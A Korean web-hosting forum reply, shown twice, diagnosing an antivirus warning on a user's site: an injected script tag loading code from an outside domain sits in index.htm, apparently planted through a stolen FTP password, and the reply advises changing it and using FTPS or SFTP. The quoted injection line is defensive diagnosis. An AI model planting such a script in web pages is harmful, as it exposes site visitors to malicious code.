저는 네이버 PC그린 쓰고 있는데 바이러스 경고창은 안 뜨더군요. 알약 깔아 테스트해 보니 첨부하신 이미지처럼 경고창이 뜨네요.
쿠키 파일 열어보니 index.htm 파일 안에 <script src=http://oncgi.com?TVRJeE1USXhORGt4Tmc9PQ==> </script> 요 소스 있는 부분을 알약에서 악성 스크립트로 감지하는 것입니다. 해당 소스를 직접 인덱스에 넣으신 건지요? 그렇다면 삭제하시면 되겠죠. index.htm 파일의 생성 날짜가 12월 1일로 가장 최근이네요. 그 날 카운터를 다신 모양이군요.
아니라면 불법적인 루트로 스텍님의 FTP 패스워드가 뚫렸을 확률이 99프로입니다. 원래 FTP가 패킷 스니핑에 취약한데다 인터넷을 이용하면서 PC가 악성코드에 감염되었을 경우 알FTP와 같은 FTP 클라이언트 프로그램에 패스워드를 저장해서 쓰는 경우 바로 탈취당하게 됩니다. 패스워드 암만 복잡하게 설정해 봤자 무용지물이라는 것이죠. 그러면 크래커는 손쉽게 스텍님의 계정으로 FTP에 로그인하여 위와 같은 짧은 스크립트 코드를 인덱스에 심는 것만으로도 사이트에 접속할 때마다 스크립트에 포함된 URL로 패킷을 흘려보내는 수법을 쓸 수 있게 됩니다. 정말 이런 경우라면 FTP 패스워드를 변경하고 가급적이면 FTPS나 SFTP를 이용할 것을 권장합니다. 악성코드에 감염된 PC라 할지라도 FTPS나 SFTP를 사용하면 패킷이 암호화되어 서버로 전송되기에 가로채어봤자 소득이 없어 FTP보다 보안상 훨씬 안전합니다.
![[레벨:1]](http://hosting.digimoon.net/board/modules/point/icons/default/1.gif "포인트:200point (40%), 레벨:1/30"){kind=icon}
스텍
![[레벨:15]](http://hosting.digimoon.net/board/modules/point/icons/default/15.gif "포인트:21360point (39%), 레벨:15/30"){kind=icon}
디지문
알약 깔아 테스트해 보니 첨부하신 이미지처럼 경고창이 뜨네요.
쿠키 파일 열어보니 index.htm 파일 안에 <script src=http://oncgi.com?TVRJeE1USXhORGt4Tmc9PQ==> </script> 요 소스 있는 부분을 알약에서 악성 스크립트로 감지하는 것입니다.
해당 소스를 직접 인덱스에 넣으신 건지요? 그렇다면 삭제하시면 되겠죠.
index.htm 파일의 생성 날짜가 12월 1일로 가장 최근이네요. 그 날 카운터를 다신 모양이군요.
아니라면 불법적인 루트로 스텍님의 FTP 패스워드가 뚫렸을 확률이 99프로입니다.
원래 FTP가 패킷 스니핑에 취약한데다 인터넷을 이용하면서 PC가 악성코드에 감염되었을 경우 알FTP와 같은 FTP 클라이언트 프로그램에 패스워드를 저장해서 쓰는 경우 바로 탈취당하게 됩니다. 패스워드 암만 복잡하게 설정해 봤자 무용지물이라는 것이죠. 그러면 크래커는 손쉽게 스텍님의 계정으로 FTP에 로그인하여 위와 같은 짧은 스크립트 코드를 인덱스에 심는 것만으로도 사이트에 접속할 때마다 스크립트에 포함된 URL로 패킷을 흘려보내는 수법을 쓸 수 있게 됩니다.
정말 이런 경우라면 FTP 패스워드를 변경하고 가급적이면 FTPS나 SFTP를 이용할 것을 권장합니다. 악성코드에 감염된 PC라 할지라도 FTPS나 SFTP를 사용하면 패킷이 암호화되어 서버로 전송되기에 가로채어봤자 소득이 없어 FTP보다 보안상 훨씬 안전합니다.